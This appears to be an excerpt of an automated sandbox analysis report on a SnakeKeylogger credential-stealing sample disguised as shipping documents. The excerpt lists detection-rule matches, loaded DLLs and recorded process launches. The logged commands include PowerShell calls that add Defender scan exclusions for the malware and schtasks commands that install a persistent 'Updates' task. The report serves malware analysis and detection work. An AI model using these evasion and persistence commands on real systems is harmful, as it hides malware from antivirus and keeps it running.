                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1728733569.0000000003327000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000000.00000002.1726790229.00000000013FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000009.00000002.4134998750.0000000000CF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exe, 00000009.00000002.4134245226.0000000000446000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exeBinary or memory string: OriginalFilenameYGc.exe6 vs rShipmentDocuments.exe
                Source: rShipmentDocuments.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: rShipmentDocuments.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ZOlmYtPdlO.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, B--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, B--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, B--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@25/15@3/4
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeMutant created: \Sessions\1\BaseNamedObjects\RDJCqbWVNpnzGVnTyiGSZiAgR
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile created: C:\Users\user\AppData\Local\Temp\tmp44A0.tmpJump to behavior
                Source: rShipmentDocuments.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rShipmentDocuments.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: rShipmentDocuments.exeVirustotal: Detection: 37%
                Source: rShipmentDocuments.exeReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeFile read: C:\Users\user\Desktop\rShipmentDocuments.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeProcess created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exeProcess created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\rShipmentDocuments.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
